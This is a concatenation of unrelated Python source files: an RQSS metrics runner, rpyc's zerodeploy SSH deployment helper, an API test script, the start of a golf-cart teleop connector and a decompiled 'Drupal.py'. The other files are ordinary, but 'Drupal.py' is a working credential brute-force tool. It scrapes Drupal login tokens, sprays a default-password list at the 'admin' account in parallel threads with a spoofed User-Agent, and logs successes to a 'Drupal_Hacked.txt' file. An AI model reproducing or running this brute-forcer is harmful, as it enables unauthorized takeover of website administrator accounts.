    output_file_dist = os.path.join(opts.output_dir, 'fact_freshness.csv')
    output_file_result = os.path.join(
        opts.output_dir, 'fact_freshness_ratio.csv')
    # reading the item/referenced-fact pairs
    print('Reading data ...')
    item_refed_facts = {}
    try:
        with open(input_data_file, encoding="utf8") as file:
            for row in csv.reader(file):
                # setdefault replaces the manual membership-check/init pair
                item_refed_facts.setdefault(str(row[0]), []).append(row[1])
    except FileNotFoundError:
        print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
            '"item_refed_facts.data"'))
        sys.exit(1)  # sys.exit instead of the site-provided exit()
    # running the framework metric function
    print('Running metric ...')
    start_time = datetime.datetime.now()
    freshness_checker = ReferenceFreshnessInItemChecker(
        item_refed_facts, opts.upper_date)
    dist = freshness_checker.check_referenced_facts_freshness()
    end_time = datetime.datetime.now()
    # saving the results for presentation layer (the checker keeps the
    # per-item distribution on `.results`)
    if len(dist) > 0:
        write_results_to_CSV(freshness_checker.results, output_file_dist)
        write_results_to_CSV(str(freshness_checker), output_file_result)
        print('Metric: Freshness of fact referencing results have been written in the files: {0} and {1}'.format(
            output_file_dist, output_file_result))
    print('DONE. Metric: Freshness of fact referencing, Duration: {0}'.format(
        end_time - start_time))
    return 0
def compute_external_uris_freshness(opts: ArgumentParser) -> int:
    """Compute the metric: Freshness of external sources.

    Reads 'external_uris.data' from opts.data_dir and estimates each URI's
    freshness (optionally via the Google cache when
    opts.extract_google_cache is set). Returns 0 on success; exits the
    process if the input file is missing.
    """
    print('Started computing Metric: Freshness of external sources')
    # os.path.join with separate components (was join(a + os.sep + b))
    input_data_file = os.path.join(opts.data_dir, 'external_uris.data')
    output_file_dist = os.path.join(
        opts.output_dir, 'external_uris_freshness.csv')
    output_file_result = os.path.join(
        opts.output_dir, 'external_uris_freshness_ratio.csv')
    # reading the extracted External URIs
    print('Reading data ...')
    try:
        with open(input_data_file, encoding="utf8") as file:
            uris = [line.rstrip() for line in file]
    except FileNotFoundError:
        print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
            '"external_uris.data"'))
        sys.exit(1)  # sys.exit instead of the site-provided exit()
    # running the framework metric function
    print('Running metric ...')
    start_time = datetime.datetime.now()
    freshness_checker = ExternalURIsFreshnessChecker(
        uris, extract_google_cache=opts.extract_google_cache)
    results = freshness_checker.check_external_uris_freshness()
    end_time = datetime.datetime.now()
    # saving the results for presentation layer
    if len(results) > 0:
        write_results_to_CSV(freshness_checker.results, output_file_dist)
        write_results_to_CSV(str(freshness_checker), output_file_result)
        print('Metric: Freshness of external sources results have been written in the file: {0} and {1}'.format(
            output_file_dist, output_file_result))
    print('DONE. Metric: Freshness of external sources, Duration: {0}'.format(
        end_time - start_time))
    return 0
def compute_external_uris_volatility(opts: ArgumentParser) -> int:
    """Compute the metric: Volatility of external sources.

    Reads 'external_uris.data' from opts.data_dir and estimates each URI's
    volatility. Returns 0 on success; exits the process if the input file
    is missing.
    """
    print('Started computing Metric: Volatility of external sources')
    # os.path.join with separate components (was join(a + os.sep + b))
    input_data_file = os.path.join(opts.data_dir, 'external_uris.data')
    output_file_dist = os.path.join(
        opts.output_dir, 'external_uris_volatility.csv')
    output_file_result = os.path.join(
        opts.output_dir, 'external_uris_volatility_ratio.csv')
    # reading the extracted External URIs
    print('Reading data ...')
    try:
        with open(input_data_file, encoding="utf8") as file:
            uris = [line.rstrip() for line in file]
    except FileNotFoundError:
        print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
            '"external_uris.data"'))
        sys.exit(1)  # sys.exit instead of the site-provided exit()
    # running the framework metric function
    print('Running metric ...')
    start_time = datetime.datetime.now()
    volatility_checker = ExternalURIsVolatilityChecker(uris)
    results = volatility_checker.check_external_uris_volatility()
    end_time = datetime.datetime.now()
    # saving the results for presentation layer
    if len(results) > 0:
        write_results_to_CSV(volatility_checker.results, output_file_dist)
        write_results_to_CSV(str(volatility_checker), output_file_result)
        print('Metric: Volatility of external sources results have been written in the file: {0} and {1}'.format(
            output_file_dist, output_file_result))
    print('DONE. Metric: Volatility of external sources, Duration: {0}'.format(
        end_time - start_time))
    return 0
def compute_external_uris_timeliness(opts: ArgumentParser) -> int:
    """Compute the metric: Timeliness of external sources.

    Combines the previously-computed freshness and volatility CSVs (read
    from opts.output_dir, not data_dir) into a timeliness score. Returns 0
    on success; exits the process if either prerequisite file is missing.
    """
    print('Started computing Metric: Timeliness of external sources')
    # os.path.join with separate components (was join(a + os.sep + b))
    input_data_file_freshness = os.path.join(
        opts.output_dir, 'external_uris_freshness.csv')
    input_data_file_volatility = os.path.join(
        opts.output_dir, 'external_uris_volatility.csv')
    output_file_dist = os.path.join(
        opts.output_dir, 'external_uris_timeliness.csv')
    output_file_result = os.path.join(
        opts.output_dir, 'external_uris_timeliness_ratio.csv')
    # reading the freshness input data
    print('Reading data ...')
    freshnesses = []
    volatilities = []
    try:
        with open(input_data_file_freshness, encoding="utf8") as file:
            reader = csv.reader(file)
            next(reader, None)  # skip the headers
            for row in reader:
                # '<None>' is the placeholder written by write_results_to_CSV
                freshnesses.append(FreshnessOfURI(URIRef(str(row[0])), freshness_last_modif=float(
                    row[1]) if row[1] != '<None>' else None))
    except FileNotFoundError:
        print("Error: Input data file of freshness scores not found. Provide data file with name: {0} in --output-dir".format(
            '"external_uris_freshness.csv"'))
        sys.exit(1)  # sys.exit instead of the site-provided exit()
    # reading the volatility input data
    try:
        with open(input_data_file_volatility, encoding="utf8") as file:
            reader = csv.reader(file)
            next(reader, None)  # skip the headers
            for row in reader:
                volatilities.append(VolatilityOfURI(
                    URIRef(str(row[0])), float(row[1]) if row[1] != '<None>' else None))
    except FileNotFoundError:
        print("Error: Input data file of volatility scores not found. Provide data file with name: {0} in --output-dir".format(
            '"external_uris_volatility.csv"'))
        sys.exit(1)
    # running the framework metric function
    print('Running metric ...')
    start_time = datetime.datetime.now()
    timeliness_checker = ExternalURIsTimelinessChecker(
        freshnesses, volatilities)
    results = timeliness_checker.check_external_uris_timeliness()
    end_time = datetime.datetime.now()
    # saving the results for presentation layer
    if len(results) > 0:
        write_results_to_CSV(timeliness_checker.results, output_file_dist)
        write_results_to_CSV(str(timeliness_checker), output_file_result)
        print('Metric: Timeliness of external sources results have been written in the file: {0} and {1}'.format(
            output_file_dist, output_file_result))
    print('DONE. Metric: Timeliness of external sources, Duration: {0}'.format(
        end_time - start_time))
    return 0
def compute_class_property_schema_completeness(opts: ArgumentParser) -> int:
    """Compute the metric: Schema completeness of references.

    Builds per-EntitySchema summaries (related classes/properties and
    referenced-fact reference predicates) from the two summarization CSVs,
    then checks the instance-level class/fact/reference data against them.
    Returns 0 on success; exits the process if any input file is missing.
    """
    print('Started computing Metric: Schema completeness of references')
    # os.path.join with separate components (was join(a + os.sep + b))
    input_data_file = os.path.join(opts.data_dir, 'classes_facts_refs.data')
    input_eid_summarization_related_classes = os.path.join(
        opts.data_dir, 'eschemas_summarization_related_classes.data')
    input_eid_summarization_refed_fact_refs = os.path.join(
        opts.data_dir, 'eschemas_summarization_related_refed_fact_refs.data')
    output_file_dist = os.path.join(
        opts.output_dir, 'class_property_schema_completeness.csv')
    output_file_result = os.path.join(
        opts.output_dir, 'class_property_schema_completeness_ratio.csv')
    # reading eid data
    print('Reading Entity Schemas data ...')
    try:
        with open(input_eid_summarization_related_classes, encoding="utf8") as file:
            related_class_csv = pd.read_csv(file)
    except FileNotFoundError:
        print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
            '"eschemas_summarization_related_classes.data"'))
        sys.exit(1)  # sys.exit instead of the site-provided exit()
    try:
        with open(input_eid_summarization_refed_fact_refs, encoding="utf8") as file:
            refed_fact_refs_csv = pd.read_csv(file)
    except FileNotFoundError:
        print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
            '"eschemas_summarization_related_refed_fact_refs.data"'))
        sys.exit(1)
    # build one EidRefSummary per EntitySchema id
    eid_summaries: List[EidRefSummary] = []
    for eid in related_class_csv['eid'].unique().tolist():
        refed_facts_refs: List[RefedFactRef] = []
        for fact in refed_fact_refs_csv.loc[(refed_fact_refs_csv['eid'] == eid), 'refed fact'].unique().tolist():
            refed_facts_refs.append(RefedFactRef(fact, refed_fact_refs_csv.loc[(refed_fact_refs_csv['eid'] == eid) & (
                refed_fact_refs_csv['refed fact'] == fact), 'ref predicate'].dropna().tolist()))
        eid_summaries.append(EidRefSummary(eid, related_class_csv.loc[related_class_csv['eid'] == eid, 'related class'].dropna(
        ).tolist(), related_class_csv.loc[related_class_csv['eid'] == eid, 'related property'].dropna().tolist(), refed_facts_refs))
    print('Number of E-ids: ', len(eid_summaries))
    print('Number of E-ids with referenced facts: ',
          sum([1 for i in eid_summaries if len(i.refed_facts_refs) > 0]))
    # reading the input instance-level data
    print('Reading instance-level data ...')
    refed_fact_refs: Dict = {}
    try:
        with open(input_data_file, encoding="utf8") as file:
            for row in csv.reader(file):
                # setdefault replaces the manual membership-check/init pair
                refed_fact_refs.setdefault(str(row[0]), []).append(row[1])
    except FileNotFoundError:
        print("Error: Input data file not found. Provide input data file with name: {0} in data_dir".format(
            '"classes_facts_refs.data"'))
        sys.exit(1)
    # running the framework metric function
    print('Running metric ...')
    start_time = datetime.datetime.now()
    schema_comp_checker = ClassesPropertiesSchemaCompletenessChecker(
        refed_fact_refs)
    results = schema_comp_checker.check_ref_schema_existance_for_properties_Wikidata(
        eid_summaries)
    end_time = datetime.datetime.now()
    # saving the results for presentation layer
    if len(results) > 0:
        write_results_to_CSV(schema_comp_checker.results, output_file_dist)
        write_results_to_CSV(str(schema_comp_checker), output_file_result)
        print('Metric: Schema completeness of references results have been written in the file: {0} and {1}'.format(
            output_file_dist, output_file_result))
    print('DONE. Metric: Schema completeness of references, Duration: {0}'.format(
        end_time - start_time))
    return 0
def RQSS_Framework_Runner(argv: Optional[Union[str, List[str]]] = None, prog: Optional[str] = None) -> int:
    """Parse command-line options and run the selected RQSS metrics in parallel.

    Each enabled metric runs in its own ``multiprocessing.Process``; the
    function blocks until every spawned metric process has finished.

    Args:
        argv: argument vector (a string is split on whitespace); defaults to
            ``sys.argv[1:]`` when None.
        prog: program name forwarded to the argument parser.

    Returns:
        0 on success, 1 when the input data directory does not exist.
    """
    if isinstance(argv, str):
        argv = argv.split()
    opts = genargs(prog).parse_args(argv if argv is not None else sys.argv[1:])
    # checking existence of the input data directory
    opts.data_dir = Path(opts.data_dir)
    if not opts.data_dir.is_dir():
        print('The data directory "{0}" not existed.'.format(opts.data_dir))
        return 1
    opts.data_dir = str(opts.data_dir.resolve(strict=True))
    # creating the output destination directory
    print('Creating output directory: {0}'.format(opts.output_dir))
    Path(opts.output_dir).mkdir(parents=True, exist_ok=True)
    # (enabled flag, metric function) dispatch table: one row per metric.
    metric_dispatch = [
        (opts.dereferencing, compute_dereferencing),
        (opts.licensing, compute_licensing),
        (opts.security, compute_security),
        (opts.ref_triple_syntax, compute_ref_triple_syntax),
        (opts.ref_literal_syntax, compute_ref_literal_syntax),
        (opts.ref_triple_semantic, compute_ref_triple_semantic),
        (opts.ref_property_consistency, compute_ref_properties_consistency),
        (opts.range_consistency, compute_range_consistency),
        (opts.ref_sharing, compute_ref_sharing_ratio),
        (opts.reputation, compute_dnsbl_reputation),
        (opts.multiple_ref, compute_multiple_referenced),
        (opts.human_added, compute_human_added_references_per_item),
        (opts.ref_freshness, compute_referenced_facts_reference_freshness_per_item),
        (opts.ext_uris_freshness, compute_external_uris_freshness),
        (opts.ext_uris_volatility, compute_external_uris_volatility),
        (opts.ext_uris_timeliness, compute_external_uris_timeliness),
        (opts.class_property_schema_completeness, compute_class_property_schema_completeness),
    ]
    # list of parallel processes
    # BUG FIX: the original code used Process(target=compute_X(opts)), which
    # CALLS each metric immediately (sequentially, in this process) and hands
    # its return value to Process as the target. Pass the callable plus its
    # args instead so the metrics actually run in parallel child processes.
    framework_procs = [Process(target=metric_func, args=(opts,))
                       for enabled, metric_func in metric_dispatch if enabled]
    for proc in framework_procs:
        proc.start()
    for proc in framework_procs:
        proc.join()
    return 0
if __name__ == '__main__':
    # CLI entry point: forward the command-line arguments to the runner.
    RQSS_Framework_Runner(sys.argv[1:])
|
zerodeploy.py | """
.. versionadded:: 3.3
Requires [plumbum](http://plumbum.readthedocs.org/)
"""
from __future__ import with_statement
import sys
import rpyc
import socket
from rpyc.lib.compat import BYTES_LITERAL
from rpyc.core.service import VoidService
from rpyc.core.stream import SocketStream
try:
    from plumbum import local, ProcessExecutionError, CommandNotFound
    from plumbum.path import copy
except ImportError:
    import inspect
    # Tolerate a missing plumbum only while the documentation is being built:
    # sphinx/autodoc imports this module just to read its docstrings.
    if any("sphinx" in line[1] or "docutils" in line[1] or "autodoc" in line[1] for line in inspect.stack()):
        # let the sphinx docs be built without requiring plumbum installed
        pass
    else:
        raise
SERVER_SCRIPT = r"""\
import sys
import os
import atexit
import shutil
from threading import Thread
here = os.path.dirname(__file__)
os.chdir(here)
def rmdir():
shutil.rmtree(here, ignore_errors = True)
atexit.register(rmdir)
try:
for dirpath, _, filenames in os.walk(here):
for fn in filenames:
if fn == "__pycache__" or (fn.endswith(".pyc") and os.path.exists(fn[:-1])):
os.remove(os.path.join(dirpath, fn))
except Exception:
pass
sys.path.insert(0, here)
from $MODULE$ import $SERVER$ as ServerCls
from rpyc import SlaveService
logger = None
$EXTRA_SETUP$
t = ServerCls(SlaveService, hostname = "localhost", port = 0, reuse_addr = True, logger = logger)
thd = Thread(target = t.start)
thd.setDaemon(True)
thd.start()
sys.stdout.write("%s\n" % (t.port,))
sys.stdout.flush()
try:
sys.stdin.read()
finally:
t.close()
thd.join(2)
"""
class DeployedServer(object):
    """
    Sets up a temporary, short-lived RPyC deployment on the given remote machine. It will:

    1. Create a temporary directory on the remote machine and copy RPyC's code
       from the local machine to the remote temporary directory.
    2. Start an RPyC server on the remote machine, binding to an arbitrary TCP port,
       allowing only in-bound connections (``localhost`` connections). The server reports the
       chosen port over ``stdout``.
    3. An SSH tunnel is created from an arbitrary local port (on the local host), to the remote
       machine's chosen port. This tunnel is authenticated and encrypted.
    4. You get a ``DeployedServer`` object that can be used to connect to the newly-spawned server.
    5. When the deployment is closed, the SSH tunnel is torn down, the remote server terminates
       and the temporary directory is deleted.

    :param remote_machine: a plumbum ``SshMachine`` or ``ParamikoMachine`` instance, representing
                           an SSH connection to the desired remote machine
    :param server_class: the server to create (e.g., ``"ThreadedServer"``, ``"ForkingServer"``)
    :param extra_setup: any extra code to add to the script
    :param python_executable: name/path of the remote python to use; autodetected when None
    """

    def __init__(self, remote_machine, server_class = "rpyc.utils.server.ThreadedServer", extra_setup = "", python_executable=None):
        # Initialise the cleanup handles first so close()/__del__ are safe
        # even if the rest of the constructor fails part-way through.
        self.proc = None
        self.tun = None
        self.remote_machine = remote_machine
        self._tmpdir_ctx = None
        # Copy the locally-installed rpyc package into a fresh remote temp dir.
        rpyc_root = local.path(rpyc.__file__).up()
        self._tmpdir_ctx = remote_machine.tempdir()
        tmp = self._tmpdir_ctx.__enter__()
        copy(rpyc_root, tmp / "rpyc")
        script = (tmp / "deployed-rpyc.py")
        modname, clsname = server_class.rsplit(".", 1)
        # Instantiate the bootstrap template with the requested server class.
        script.write(SERVER_SCRIPT.replace("$MODULE$", modname).replace("$SERVER$", clsname).replace("$EXTRA_SETUP$", extra_setup))
        if python_executable:
            cmd = remote_machine[python_executable]
        else:
            # No explicit interpreter given: prefer a remote python matching
            # the local major.minor, then the local major, then plain default.
            major = sys.version_info[0]
            minor = sys.version_info[1]
            cmd = None
            for opt in ["python%s.%s" % (major, minor), "python%s" % (major,)]:
                try:
                    cmd = remote_machine[opt]
                except CommandNotFound:
                    pass
                else:
                    break
            if not cmd:
                cmd = remote_machine.python

        # Launch the remote server detached from our session; its first line
        # of stdout is the TCP port it bound to.
        self.proc = cmd.popen(script, new_session = True)

        line = ""
        try:
            line = self.proc.stdout.readline()
            self.remote_port = int(line.strip())
        except Exception:
            # The server failed to start: reap the process and surface its
            # combined output in the raised error.
            try:
                self.proc.terminate()
            except Exception:
                pass
            stdout, stderr = self.proc.communicate()
            raise ProcessExecutionError(self.proc.argv, self.proc.returncode, BYTES_LITERAL(line) + stdout, stderr)

        if hasattr(remote_machine, "connect_sock"):
            # Paramiko: use connect_sock() instead of tunnels
            self.local_port = None
        else:
            # Reserve a free local port by binding to port 0, then hand that
            # port number to an SSH tunnel up to the remote server.
            # NOTE(review): there is a small window between s.close() and the
            # tunnel creation where another process could grab the port.
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.bind(("localhost", 0))
            self.local_port = s.getsockname()[1]
            s.close()
            self.tun = remote_machine.tunnel(self.local_port, self.remote_port)

    def __del__(self):
        # Best-effort cleanup when the object is garbage-collected.
        self.close()

    def __enter__(self):
        return self

    def __exit__(self, t, v, tb):
        self.close()

    def close(self):
        """Tear down the remote process, the SSH tunnel, and the temp dir.

        Each step is best-effort so one failure does not block the rest;
        close() is idempotent.
        """
        if self.proc is not None:
            try:
                self.proc.terminate()
            except Exception:
                pass
            self.proc = None
        if self.tun is not None:
            try:
                self.tun.close()
            except Exception:
                pass
            self.tun = None
        if self._tmpdir_ctx is not None:
            try:
                self._tmpdir_ctx.__exit__(None, None, None)
            except Exception:
                pass
            self._tmpdir_ctx = None

    def connect(self, service = VoidService, config = {}):
        """Same as :func:`connect <rpyc.utils.factory.connect>`, but with the ``host`` and ``port``
        parameters fixed"""
        if self.local_port is None:
            # ParamikoMachine: open a direct-tcpip channel instead of a tunnel
            stream = SocketStream(self.remote_machine.connect_sock(self.remote_port))
            return rpyc.connect_stream(stream, service = service, config = config)
        else:
            return rpyc.connect("localhost", self.local_port, service = service, config = config)

    def classic_connect(self):
        """Same as :func:`classic.connect <rpyc.utils.classic.connect>`, but with the ``host`` and
        ``port`` parameters fixed"""
        if self.local_port is None:
            # ParamikoMachine: open a direct-tcpip channel instead of a tunnel
            stream = SocketStream(self.remote_machine.connect_sock(self.remote_port))
            return rpyc.classic.connect_stream(stream)
        else:
            return rpyc.classic.connect("localhost", self.local_port)
class MultiServerDeployment(object):
    """
    An 'aggregate' deployment over several SSH machines: RPyC is deployed to
    each machine individually, but the whole fleet is managed as one unit.
    """

    def __init__(self, remote_machines, server_class = "ThreadedServer"):
        self.remote_machines = remote_machines
        # Deploy to every machine, then publish the finished list on self.
        deployed = [DeployedServer(machine, server_class)
                    for machine in remote_machines]
        self.servers = deployed

    def __del__(self):
        self.close()

    def __enter__(self):
        return self

    def __exit__(self, t, v, tb):
        self.close()

    def __iter__(self):
        return iter(self.servers)

    def __len__(self):
        return len(self.servers)

    def __getitem__(self, index):
        return self.servers[index]

    def close(self):
        """Close every deployment, draining the list front-to-back."""
        while self.servers:
            self.servers.pop(0).close()

    def connect_all(self, service = VoidService, config = {}):
        """connects to all deployed servers; returns a list of connections (order guaranteed)"""
        connections = []
        for srv in self.servers:
            connections.append(srv.connect(service, config))
        return connections

    def classic_connect_all(self):
        """connects to all deployed servers using classic_connect; returns a list of connections (order guaranteed)"""
        connections = []
        for srv in self.servers:
            connections.append(srv.classic_connect())
        return connections
|
Drupal.py | # uncompyle6 version 2.11.5
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41)
# [GCC 9.3.0]
# Embedded file name: BruteForce\Drupal.py
import requests
import re
import threading
import time
from Exploits import printModule
# ANSI colour escape codes used for console output.
r = '\x1b[31m'
g = '\x1b[32m'
y = '\x1b[33m'
b = '\x1b[34m'
m = '\x1b[35m'
c = '\x1b[36m'
w = '\x1b[37m'
# Default request headers (spoofed desktop browser User-Agent).
Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0'}
# Load the candidate password list once at import time. Use a context manager
# so the file handle is closed (the original left the file object open).
with open('files/DefaultPasswords_Drupal.txt', 'r') as _password_file:
    passwords = _password_file.read().splitlines()
class DrupalBruteForce(object):
    """Brute-forces the Drupal admin login of a target site.

    One worker thread is spawned per candidate password (slightly throttled);
    the first successful login sets ``self.flag`` and stops further spawning.
    """

    def __init__(self):
        # 0 = no valid credentials found yet, 1 = a password worked.
        self.flag = 0
        self.password = passwords

    def Run(self, site):
        """Try every candidate password against *site*; return a report line."""
        thread = []
        for passwd in self.password:
            t = threading.Thread(target=self.Drupal, args=(site, passwd))
            if self.flag == 1:
                # A previous worker already succeeded: stop spawning.
                break
            else:
                t.start()
                thread.append(t)
                time.sleep(0.08)  # throttle thread creation a little
        for j in thread:
            j.join()
        if self.flag == 0:
            return printModule.returnNo(site, 'N/A', 'Drupal Bruteforce', 'Drupal')
        else:
            return printModule.returnYes(site, 'N/A', 'Drupal Bruteforce', 'Drupal')

    def Drupal(self, site, passwd):
        """Attempt one admin login with *passwd*; record a hit on success."""
        try:
            agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0'}
            sess = requests.session()
            GetToken = sess.get('http://' + site + '/user/login', timeout=5, headers=agent)
            # Scrape the form tokens Drupal embeds in the login form.
            GetTokeBuld = re.findall('name="form_build_id" value="(.*)"', str(GetToken.content))[0]
            GetNameform = re.findall('name="form_id" value="(.*)"', str(GetToken.content))[0]
            PostData = {'name': 'admin',
                        'pass': passwd,
                        'form_build_id': GetTokeBuld,
                        'form_id': GetNameform,
                        'op': 'Log+in'
                        }
            url = 'http://' + site + '/user/login'
            GoT = sess.post(url, data=PostData, headers=agent, timeout=10)
            if 'Log out' in str(GoT.content) and 'edit' in str(GoT.content):
                with open('result/Drupal_Hacked.txt', 'a') as writer:
                    writer.write('http://' + site + '/user/login' + '\n Username: admin' + '\n Password: ' + passwd + '\n-----------------------------------------\n')
                self.flag = 1
        except Exception:
            # Best-effort probe: any network/parse failure just means this
            # attempt failed. (Was a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit.)
            pass
api_tests.py | import os
import subprocess as sp
from urllib.parse import urljoin
import requests
from multiprocessing import Process
from time import sleep
from datetime import timedelta,datetime
import random
import argparse
# Parser configs
parser = argparse.ArgumentParser(description='used for testing cpga-book-server api')
# type=int makes argparse reject non-numeric ports with a clean usage error
# instead of crashing later on int(args.p).
parser.add_argument('-p', help='port to run server on(default:3000)', type=int)
parser.add_argument('-v', help='to show server logs or not', action="store_true")
args = parser.parse_args()
PORT = args.p if args.p else 3000
# Base URL may be overridden via the environment (e.g. a deployed instance);
# read it once instead of calling os.environ.get twice.
_env_url = os.environ.get("URL")
url = _env_url if _env_url is not None else f'http://localhost:{PORT}/'
#url='http://api-rhapsody.herokuapp.com/'
class bcolors:
    """ANSI terminal escape sequences used to colourize console output."""
    HEADER = '\033[95m'     # bright magenta
    OKBLUE = '\033[94m'     # bright blue
    OKCYAN = '\033[96m'     # bright cyan
    OKGREEN = '\033[92m'    # bright green
    WARNING = '\033[93m'    # bright yellow
    FAIL = '\033[91m'       # bright red
    ENDC = '\033[0m'        # reset all attributes
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
def print_color(color, out):
    """Print *out* in bold *color*, prefixed with a status symbol.

    Symbols: green '[+] ', red '[-] ', header '[*] ', warning '[!] '.
    Unknown colors get no symbol (the original raised UnboundLocalError
    for them, e.g. for bcolors.OKBLUE).
    """
    initstr = f'{color}{bcolors.BOLD}'
    symbol = ""  # fallback for colors without a dedicated status symbol
    if color == bcolors.OKGREEN:
        symbol = "[+] "
    elif color == bcolors.FAIL:
        symbol = "[-] "
    elif color == bcolors.HEADER:
        symbol = "[*] "
    elif color == bcolors.WARNING:
        symbol = "[!] "
    final = initstr + symbol + f'{out}{bcolors.ENDC}'
    print(final)
def start_node_server(process):
    """Pump the node server's stdout until the process exits.

    Runs in a child process; echoes server output when -v was passed and
    aborts early when MongoDB is unreachable.
    """
    while True:
        output = process.stdout.readline()
        # readline() on a binary PIPE yields *bytes*; the original compared
        # against the str '' so the exit test never fired and the loop spun
        # forever once the server died. A falsiness test handles both types.
        if not output and process.poll() is not None:
            break
        if output:
            output = output.decode().strip()
            if 'MongooseServerSelectionError: connect ECONNREFUSED 127.0.0.1:27017' in output:
                print_color(bcolors.FAIL, 'enable mongodb service')
                break
            if args.v:
                print(output)
def test_url_get_list(path,params):
    """Exercise one list endpoint three ways and report pass/fail per check.

    Checks: a plain GET (expects 200), a GET with a future If-Modified-Since
    header (expects 304), and a GET with an epoch If-Modified-Since header
    (expects 200 again).

    Returns (college_list, success): the parsed list body from the first
    response, and whether all three checks passed.
    """
    success=True
    testurl=urljoin(url,path)
    sleeptime=0.5
    print_color(bcolors.HEADER,f'testing url {testurl}')
    print_color(bcolors.HEADER,f'testing without if-modified-since\n')
    r=requests.get(testurl,params=params)
    college_list=[]
    sleep(sleeptime)
    if(r.status_code==200):
        print_color(bcolors.OKGREEN,f'Success {r.status_code}')
        # Hand-rolled parse of a JSON-ish array body: strips brackets, splits
        # on commas, strips quotes. NOTE(review): r.json() would be more
        # robust if the API really returns JSON — confirm the response format.
        college_list=[i.strip().strip("\"''").strip() for i in r.text.strip('][').split(",")]
    else:
        print_color(bcolors.FAIL,f'Failed {r.status_code}')
        success=False
    print_seperator('-')
    print_color(bcolors.HEADER,f'testing with future if-modified-since\n')
    # A timestamp 25h in the future: nothing can have changed since then,
    # so a correct server answers 304 Not Modified.
    header={'If-modified-since':(datetime.now()+timedelta(hours=25)).isoformat()}
    r=requests.get(testurl,headers=header,params=params)
    sleep(sleeptime)
    if(r.status_code==304):
        print_color(bcolors.OKGREEN,f'Success {r.status_code}')
    else:
        print_color(bcolors.FAIL,f'Failed {r.status_code}')
        success=False
    print_seperator('-')
    # Epoch timestamp: everything has been modified since, expect a full 200.
    header={'If-modified-since':(datetime.fromtimestamp(0)).isoformat()}
    print_color(bcolors.HEADER,f'testing with past if-modified-since\n')
    r=requests.get(testurl,headers=header,params=params)
    sleep(sleeptime)
    if(r.status_code==200):
        print_color(bcolors.OKGREEN,f'Success {r.status_code}')
    else:
        print_color(bcolors.FAIL,f'Failed {r.status_code}')
        success=False
    print_seperator('-')
    return college_list,success
def print_seperator(sep):
    """Print a visual separator: 80 stars for '*', 40 dashes for '-'.

    (The function name keeps the project's original spelling; other
    characters print nothing.)
    """
    if sep == '*':
        print('\n\n' + '*' * 80 + '\n\n')
    elif sep == '-':
        print('\n' + '-' * 40 + '\n')
# Boot the node server, probe each list endpoint in turn, always clean up.
# Pre-bind the cleanup handles so the finally block below cannot hit a
# NameError when sp.Popen itself fails (e.g. npm not installed).
process = None
node = None
try:
    myenv = os.environ.copy()
    myenv["PORT"] = str(PORT)
    process = sp.Popen('npm start'.split(), env=myenv, stderr=sp.STDOUT, stdout=sp.PIPE)
    node = Process(target=start_node_server, args=(process,))
    node.start()
    sleep(5)  # give the server time to come up before probing it
    keys = ['college', 'course', 'branch', 'semester']
    paths = [
        '/academia/college-list',
        '/academia/course-list',
        '/academia/branch-list',
        '/academia/semester-list'
    ]
    params = {}
    # Each endpoint narrows the next query: pick a random entry from the
    # returned list and pass it along as a filter parameter.
    for i in range(len(keys)):
        out_list, res = test_url_get_list(paths[i], params)
        params[keys[i]] = out_list[random.randint(0, len(out_list) - 1)].split("(")[0].strip()
        print_seperator('*')
except KeyboardInterrupt:
    pass
finally:
    if process is not None:
        process.terminate()
    if node is not None:
        node.terminate()
|
connector.py | import socket
import logging
import sys
import threading
import time
import src.util as util
# Drive Computer Remote Telop Client
# Connector
#
# Part of the GSSM Autonomous Golf Cart
# Written by:
# Benjamin Chauhan, class of 2022
# Joseph Telaak, class of 2022
class Teleop_Connector:
    """Client-side connector for remotely tele-operating the drive computer.

    Opens a UDP command channel plus TCP log/response listener sockets, and
    mirrors all traffic into log files and (for responses/log) the console.
    """

    def __init__(self, ip_addr, establish_port=42070, command_port=70, log_port=421, response_port=778):
        """Create the sockets, loggers, listener threads and configuration."""
        # Create Ports
        self.logging_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.response_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.command_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

        # Shared record formats for the handlers below.
        # BUG FIX: Handler.setFormatter() expects a logging.Formatter object;
        # the original passed bare format strings, which the logging module
        # never applies (records came out unformatted).
        line_format = logging.Formatter("%(asctime)s - %(message)s")
        detailed_format = logging.Formatter("%(asctime)s - %(name)s - %(message)s")

        # Keystroke Logger (Useful for training and repeating actions)
        self.keystroke_logger = logging.getLogger("keystroke")
        self.keystroke_logger.setLevel(logging.DEBUG)
        # NOTE: the "recored" filename typo is kept so any tooling that
        # already consumes this log file keeps working.
        keystroke_file_handler = logging.FileHandler("recored_presses.log")
        keystroke_file_handler.setFormatter(line_format)
        self.keystroke_logger.addHandler(keystroke_file_handler)

        # Cart Response Logger
        self.response_logger = logging.getLogger("responses")
        self.response_logger.setLevel(logging.DEBUG)
        response_file_handler = logging.FileHandler("responses.log")
        response_file_handler.setFormatter(line_format)
        self.response_logger.addHandler(response_file_handler)
        response_console_handler = logging.StreamHandler(sys.stdout)
        response_console_handler.setFormatter(detailed_format)
        self.response_logger.addHandler(response_console_handler)

        # Cart Log
        self.logger = logging.getLogger("log")
        self.logger.setLevel(logging.DEBUG)
        log_file_handler = logging.FileHandler("log.log")
        log_file_handler.setFormatter(line_format)
        self.logger.addHandler(log_file_handler)
        log_console_handler = logging.StreamHandler(sys.stdout)
        log_console_handler.setFormatter(detailed_format)
        self.logger.addHandler(log_console_handler)

        # Config
        self.ip_addr = ip_addr
        self.establish_port = establish_port
        self.command_port = command_port
        self.log_port = log_port
        self.response_port = response_port

        # Threads (daemonized so they die with the main program)
        self.log_listener_thread = threading.Thread(target=self.log_listener, name="log listener", daemon=True)
